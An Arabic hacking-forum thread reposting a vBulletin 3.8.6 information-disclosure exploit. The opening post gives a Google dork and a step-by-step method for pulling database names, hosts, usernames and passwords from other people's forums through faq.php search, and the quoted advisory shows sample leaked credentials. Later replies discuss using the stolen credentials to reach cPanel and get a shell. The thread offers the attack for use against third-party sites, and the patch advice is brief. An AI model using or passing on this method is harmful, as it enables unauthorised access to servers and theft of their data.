Follow us on Twitter Follow us on Facebook Watch us on YouTube





العودة   development-point > [ أقسام حماية واختراق المواقع والسيرفرات ] > قسم اختراق المواقع والسيرفرات > قسم الثغـرات

الملاحظات


ثغرة سكربت vBulletin 3.8.6

بسم الله الرحمن الرحيم الــسلام عليكم ورحمة الله وبركاته كيف حالكم ؟؟ الثغرة بسيطة جدا وما تحتاج شغل كثير الثغرة :

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم منذ /04-19-2013, 09:54 AM   #1
mahmodemos
V.I.B

الصورة الرمزية mahmodemos

mahmodemos غير متواجد حالياً

 رقم العضوية : 621
 تاريخ التسجيل : Feb 2013
 العمر : 27
 الجنس : ~ ذكر
 المشاركات : 615
 النقاط : 641
 قوة التقييم : mahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to all

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي ثغرة سكربت vBulletin 3.8.6

3.8.6, ثغرة, سكربت, vbulletin

بسم الله الرحمن الرحيم

الــسلام عليكم ورحمة الله وبركاته

كيف حالكم ؟؟


ثغرة سكربت vBulletin 3.8.6 GxMpK.gif

الثغرة بسيطة جدا وما تحتاج شغل كثير

الثغرة :

كود PHP:
   010101010101010101010101010101010101010101010101010101010    
   0                                                       0
   1  Iranian Datacoders Security Team 2010
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
 
# Original Advisory: http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
# Reference: http://www.securityfocus.com/archive/1/512575/30/0/threaded
 
# Exploit Title: vBulletin 3.8.6 faq.php Vulnerability                   
# Date: 24/07/2010                             
# Author: H-SK33PY                      
# Software Link: http://www.vbulletin.com/
# Version: 3.8.6
# Google dork : powered by vBulletin 3.8.6
# Platform / Tested on: linux
# Category: webapplications
# Code : N/A
 
#BUG:#########################################################################
 
Is perhaps one or the other knownbut I find that really interesting that a great and mighty forum software like vBulletin can undermine the mistake that the MySQL password for any person to be visible.
 
The issue has been published this afternoon and vBulletin responded with a patch on it.
 
The faq.php was only indirectly affected, and serves more as an "issue" because an error was partly responsible for the phrases.
 
Where are the gaps?
 
Let's look at the /install/vbulletin-language.xml file and search for "database_ingo" - what we find? Ah interesting:
 
##################################################################################################
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['
Database']['dbname']}<br />
Database Host: {$vbulletin->config['
MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['
MasterServer']['port']}<br />
Database Username: {$vbulletin->config['
MasterServer']['username']}<br />
Database Password: {$vbulletin->config['
MasterServer']['password']}]]></phrase>
##################################################################################################
 
How do I use this from now?
We look for a forum, which is affected by this vulnerability, click above on "Help" / "FAQ", enter in "search terms" or "Search Word (s):" then "Database"
(or database) and a then see, aha, first hit:
 
##################################################################################################
 
Datenbank-Name: XXXXXXXXX
 
Datenbank-Server: localhost
 
Datenbank-Port: 3306
 
Datenbank-Benutzername: root
 
Datenbank-Kennwort: my4moo
##################################################################################################
 
 
Respectively English beeen at a board:
 
##################################################################################################
Database Name: pro_aXXXXXXXXXg_com
 
Database Host: localhost
 
Database Port: 3306
 
Database Username: pro_aXXXXXXXXXg
 
Database Password: gitl0st
##################################################################################################
 
On what to do with it, I think I need not dwell on it.
 
How do I protect myself?
As already posted a patch from the official vBulletin site, or by a MySQL query:
 
##################################################################################################
DELETE FROM `vb_phrase` WHERE `varname`='
database_ingo
 
 
##################################################################################################
##################################################################################################
##################################################################################################
 
#############################################################################
Our Website : http://www.datacoders.ir
 
Special Thanks to : ccC0d3rZzz &  all iranian datacoders members
 
############################################################################# 
ثغرة سكربت vBulletin 3.8.6 GxMpK.gif

بعضنا لا يعلم كيف يستغل الثغرة

هذه طريقة الاستغلال :

ادخل اي منتدى نسخته 3.8.6

*ويمكنك البحث في قوقل
اكتب هذه الكلمة في جوجل

Powered by vBulletin™ Version 3.8.6

رابط المنتدى يكون كذا :

www.Examole.com/vb

انت ضيف بعد vb/
هذه الكلمة
faq.php
ليصبح الرابط هكذا
www.example.com/vb/faq.php

الان في صندوق البحث

ابحث عن كلمة :
Database

ستحصل على المعلمومات

الصورة توضح اكثر

ثغرة سكربت vBulletin 3.8.6 vAdRE.jpg


ومبروك عليك ثغرة سكربت vBulletin 3.8.6 smile.gif

المصدر: development-point - للمزيد تابع : قسم الثغـرات


eyvm s;vfj vBulletin 3>8>6 vbulletin






  رد مع اقتباس
قديم منذ /05-01-2013, 09:59 PM   #2
Da.MaSk
Creator

الصورة الرمزية Da.MaSk

Da.MaSk غير متواجد حالياً

 رقم العضوية : 2001
 تاريخ التسجيل : May 2013
 العمر : 25
 الجنس : ~ ذكر
 المشاركات : 2
 النقاط : 10
 قوة التقييم : Da.MaSk is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

وين لوحة التحكم طيب






  رد مع اقتباس
قديم منذ /05-01-2013, 10:02 PM   #3
mahmodemos
V.I.B

الصورة الرمزية mahmodemos

mahmodemos غير متواجد حالياً

 رقم العضوية : 621
 تاريخ التسجيل : Feb 2013
 العمر : 27
 الجنس : ~ ذكر
 المشاركات : 615
 النقاط : 641
 قوة التقييم : mahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to all

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

اخي العزيز انتا مش رح توصل للوحة التحكم


انتا الان اخذت معلومات قاعدة البيانات

وتقدر تدخل للــ cpanel






  رد مع اقتباس
قديم منذ /05-01-2013, 10:07 PM   #4
سآرة
.:: إدارية الأقـسـام العامـة ::.

الصورة الرمزية سآرة

سآرة غير متواجد حالياً

 رقم العضوية : 16
 تاريخ التسجيل : Oct 2012
 الجنس : ~ إنثى
 البلد : مصر
 المشاركات : 392
 النقاط : 75
 قوة التقييم : سآرة will become famous soon enough

شكراً: 13
تم شكره 6 مرة في 6 مشاركة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

ما شاء الله عليك
كل يوم شيئ جديد
انا فخورة اني موجودة بين عمالقة الابداع
شكرا لك
تم التقيم






  رد مع اقتباس
قديم منذ /06-25-2013, 01:13 AM   #5
i7rbi
Creator

الصورة الرمزية i7rbi

i7rbi غير متواجد حالياً

 رقم العضوية : 6541
 تاريخ التسجيل : Jun 2013
 العمر : 33
 الجنس : ~ ذكر
 المشاركات : 1
 النقاط : 10
 قوة التقييم : i7rbi is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

السلام عليكم
أخوي اعتقد انهم رقعوا هذي الثغره ولم تعد صالحه
وآسف ان كنت مخطأ في هذا (الاعتقاد)






  رد مع اقتباس
قديم منذ /06-25-2013, 03:53 AM   #6
ddt
V.I.P

الصورة الرمزية ddt

ddt غير متواجد حالياً

 رقم العضوية : 622
 تاريخ التسجيل : Feb 2013
 الجنس : ~ ذكر
 البلد : jordan
 المشاركات : 440
 إهتمامك : vb.net
 النقاط : 48
 قوة التقييم : ddt is on a distinguished road

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

المشاركة الأصلية كتبت بواسطة i7rbi مشاهدة المشاركة
السلام عليكم
أخوي اعتقد انهم رقعوا هذي الثغره ولم تعد صالحه
وآسف ان كنت مخطأ في هذا (الاعتقاد)
لاحظ تاريخ وضع الموضوع

منذ /04-19-2013, 09:54 AM






  رد مع اقتباس
قديم منذ /06-25-2013, 04:02 AM   #7
ddt
V.I.P

الصورة الرمزية ddt

ddt غير متواجد حالياً

 رقم العضوية : 622
 تاريخ التسجيل : Feb 2013
 الجنس : ~ ذكر
 البلد : jordan
 المشاركات : 440
 إهتمامك : vb.net
 النقاط : 48
 قوة التقييم : ddt is on a distinguished road

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

هي بالفعل مرقعة لكن ليس في كل المنتديات

بس كيف اعرف رابط السي بانل بعد ما استخرجت البيانات ؟ لانه مكتوب

host:localhost

بس اليوزر والباس موجودين






  رد مع اقتباس
قديم منذ /07-19-2013, 08:34 PM   #8
ElSyad
Creator

الصورة الرمزية ElSyad

ElSyad غير متواجد حالياً

 رقم العضوية : 292
 تاريخ التسجيل : Dec 2012
 الجنس : ~ ذكر
 البلد : HoMe ;d
 المشاركات : 19
 إهتمامك : HaCkInG
 النقاط : 10
 قوة التقييم : ElSyad is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

ثغرة الفاك يمكن الثغرة الي شغالة اليومين دول
بس ي حبي ممكن تكون البيانات صحيحة او تكون وهمية
تفيدك اكتر لو معاك شيل ع السيرفر
ودي لك وثغرة حلوة






  رد مع اقتباس
قديم منذ /07-19-2013, 10:51 PM   #9
mahmodemos
V.I.B

الصورة الرمزية mahmodemos

mahmodemos غير متواجد حالياً

 رقم العضوية : 621
 تاريخ التسجيل : Feb 2013
 العمر : 27
 الجنس : ~ ذكر
 المشاركات : 615
 النقاط : 641
 قوة التقييم : mahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to allmahmodemos is a name known to all

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

المشاركة الأصلية كتبت بواسطة ElSyad مشاهدة المشاركة
ثغرة الفاك يمكن الثغرة الي شغالة اليومين دول
بس ي حبي ممكن تكون البيانات صحيحة او تكون وهمية
تفيدك اكتر لو معاك شيل ع السيرفر
ودي لك وثغرة حلوة

اشكرك على الرد






  رد مع اقتباس
قديم منذ /07-30-2013, 06:56 AM   #10
GENERAL AMERICA
Ҳ̸ҳ~V.I.B~Ҳ̸ҳ

الصورة الرمزية GENERAL AMERICA

GENERAL AMERICA غير متواجد حالياً

 رقم العضوية : 6815
 تاريخ التسجيل : Jul 2013
 الجنس : ~ ذكر
 المشاركات : 964
 النقاط : 62
 قوة التقييم : GENERAL AMERICA will become famous soon enough

شكراً: 39
تم شكره 8 مرة في 7 مشاركة
افتراضي رد: ثغرة سكربت vBulletin 3.8.6

يعطيك العافية اخي محمود بارك الله فيك






  رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
3.8.6, ثغرة, سكربت, vbulletin

جديد قسم الثغـرات


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه للموضوع: ثغرة سكربت vBulletin 3.8.6
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
نسخة منتديات,إصدار النّسخة vBulletin 5 Connect Beta 11 SnipeR قسم المواضيع المُكررة والمُخالفة 3 01-16-2013 08:34 PM
ثغرة الفيس بوك 2014, ثغرة فيس بوك جديدة,برافيت على صقور الابداع,طريقة الكاتبة على الحائط بدون الادمن سآرة قسم إختراق الأجـهـزه والأيـمـيـلات 3 01-10-2013 12:06 PM


الساعة الآن 09:54 AM

 



Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
development-point